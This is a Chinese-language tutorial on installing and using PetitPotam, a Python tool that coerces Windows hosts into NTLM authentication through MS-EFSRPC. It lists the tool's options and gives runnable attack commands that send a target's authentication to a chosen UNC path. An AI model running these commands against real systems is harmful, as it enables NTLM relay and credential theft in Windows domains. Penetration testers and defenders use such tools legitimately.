PetitPotam 项目安装与使用教程
PetitPotam Python implementation for PetitPotam 项目地址: https://gitcode.com/gh_mirrors/pet/PetitPotam
1. 项目的目录结构及介绍
PetitPotam 项目的目录结构如下:
PetitPotam/
├── LICENSE
├── README.md
├── petitpotam.py
└── requirements.txt
- LICENSE: 项目的许可证文件,采用 MIT 许可证。
- README.md: 项目的说明文档,包含项目的简介、安装方法、使用示例等内容。
- petitpotam.py: 项目的主程序文件,用于执行 PetitPotam 攻击。
- requirements.txt: 项目依赖的 Python 包列表,用于安装所需的依赖库。
2. 项目的启动文件介绍
项目的启动文件是 petitpotam.py
。该文件是 PetitPotam 攻击的主要实现文件,包含了攻击所需的逻辑和功能。
启动文件功能介绍
- Coerce NTLM Authentication: 该脚本通过 MS-EFSRPC 协议强制 Windows 主机进行 NTLM 认证。
- Debug Mode: 支持调试模式,可以通过
-debug
参数启用调试输出。 - Customization Options: 提供了多种自定义选项,如指定目标端口、命名管道、认证方法等。
启动命令示例
python3 petitpotam.py -debug '172.16.19.100' '\\172.16.19.1\share\foo'
3. 项目的配置文件介绍
PetitPotam 项目没有传统的配置文件,所有的配置选项都通过命令行参数进行设置。以下是一些常用的配置选项:
- -port [destination port]: 指定目标端口,默认连接到 MS-RPRN 命名管道。
- -pipe pipe: 指定使用的命名管道,默认是
lsarpc
。 - -method method: 指定用于强制认证的方法。
- -target-ip ip address: 指定目标机器的 IP 地址。
- -hashes LMHASH:NTHASH: 使用 NTLM 哈希进行认证。
- -no-pass: 不提示输入密码(适用于 Kerberos 认证)。
- -k: 使用 Kerberos 认证,从 ccache 文件中获取凭据。
- -dc-ip ip address: 指定域控制器的 IP 地址。
配置示例
python3 petitpotam.py -debug -method AddUsersToFile '172.16.19.100' '\\172.16.19.1\share\foo'
以上命令使用 AddUsersToFile
方法强制目标主机进行认证,并将认证请求发送到指定的 UNC 路径。
通过以上步骤,您可以成功安装并使用 PetitPotam 项目进行 NTLM 认证强制攻击。
PetitPotam Python implementation for PetitPotam 项目地址: https://gitcode.com/gh_mirrors/pet/PetitPotam